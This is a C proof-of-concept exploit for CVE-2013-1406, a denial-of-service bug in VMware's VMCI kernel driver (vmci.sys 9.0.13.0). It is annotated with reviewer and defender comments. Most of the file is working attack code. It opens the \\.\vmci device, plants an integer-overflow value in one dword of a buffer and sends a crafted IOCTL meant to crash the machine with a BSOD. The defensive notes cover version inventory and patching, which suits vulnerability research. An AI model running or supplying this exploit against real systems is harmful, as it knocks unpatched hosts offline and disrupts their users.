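/*
 * CVE-2013-1406 proof of concept: denial of service through the VMware VMCI
 * kernel driver (credited in the banner below to 0x16/7ton).
 *
 * Scope, as stated by the author: this PoC is only for VMCI.SYS 9.0.13.0.
 *
 * What the listing does: opens the device \\.\vmci, fills an input buffer
 * with zeros except for one dword, and submits it with a single
 * DeviceIoControl request. The author's comments identify that dword as a
 * parameter vulnerable to integer overflow and the expected outcome as a
 * BSOD of the machine the program runs on.
 *
 * Notes for defenders:
 *  - The only access requested is a read handle to \\.\vmci. Whether a
 *    low-privileged account can obtain it depends on the device object's
 *    ACL, which this listing does not show.
 *  - The author ties the PoC to one driver build, so the file version of
 *    the installed vmci.sys is the attribute to inventory; remediation is
 *    the vendor's fix for CVE-2013-1406.
 *  - NOTE(review): a crash dump from an affected machine would presumably
 *    implicate vmci.sys - confirm against a real dump before relying on it
 *    as a triage signal.
 */
#include "stdafx.h"   /* project precompiled header (not shown); presumably provides _tmain, _TCHAR and printf */
#include "windows.h"

/* Number of 32-bit elements in the input and output buffers. */
#define count_massive 0x189
/* Control code of the request sent to the VMCI device. */
#define ioctl_vmsock 0x8103208C
/*
 * Value written to the dword the author calls the integer-overflowing
 * parameter. The original definition ended in ';', which only compiled
 * because the macro was used as a complete statement operand; the stray
 * semicolon is removed so the macro is a plain constant.
 */
#define integer_overflow_size 0x12492492

/*
 * Entry point. Opens \\.\vmci, sends one crafted IOCTL and reports the
 * outcome on stdout.
 *
 * argc, argv: unused.
 * Returns 0 on every path, as the original did.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    HANDLE vmci_device;
    DWORD bytesRet = 0;
    /* Zero-initialised so no uninitialised stack data is handed to the driver. */
    int inbuf[count_massive] = {0};
    int outbuf[count_massive] = {0};
    /* Both buffers have the same size; DeviceIoControl takes it as a DWORD. */
    DWORD buf_bytes = (DWORD)sizeof inbuf;

    (void)argc;
    (void)argv;

    printf("**************************************************\r\n");
    printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
    printf("**************************************************\r\n");

    /*
     * Open the VMCI interface device. dwFlagsAndAttributes is a DWORD, so it
     * is passed as 0 rather than NULL; hTemplateFile stays NULL.
     */
    vmci_device = CreateFileW(L"\\\\.\\vmci", GENERIC_READ,
                              FILE_SHARE_WRITE | FILE_SHARE_READ,
                              NULL, OPEN_EXISTING, 0, NULL);
    if (vmci_device == INVALID_HANDLE_VALUE)
    {
        /* Capture the error code before printf can overwrite it. */
        DWORD open_err = GetLastError();

        printf("[-]Error: Can't open vmci device!\r\n");
        /* A missing device usually means the VMCI driver is not installed. */
        printf("[-]CreateFileW error code: %lu\r\n", (unsigned long)open_err);
        return 0;
    }

    printf("[+]vmci device opened \r\n");

    /* Per the author: this dword is the parameter vulnerable to integer overflow. */
    inbuf[4] = integer_overflow_size;

    printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");

    /* Author's deliberate pause before the request: 0x29a ms, then 0x1000 ms. */
    Sleep(0x29a);
    Sleep(0x1000);

    /*
     * The original ignored the result. If control comes back here the machine
     * did not bugcheck, so the outcome is reported. NOTE(review): a return
     * presumably means the installed driver is not the affected build or
     * rejected the request - confirm against the driver version.
     */
    if (DeviceIoControl(vmci_device, ioctl_vmsock, inbuf, buf_bytes,
                        outbuf, buf_bytes, &bytesRet, NULL))
    {
        printf("[*]IOCTL returned success, %lu bytes out, no crash\r\n",
               (unsigned long)bytesRet);
    }
    else
    {
        printf("[*]IOCTL rejected, error code: %lu, no crash\r\n",
               (unsigned long)GetLastError());
    }

    CloseHandle(vmci_device);
    return 0;
}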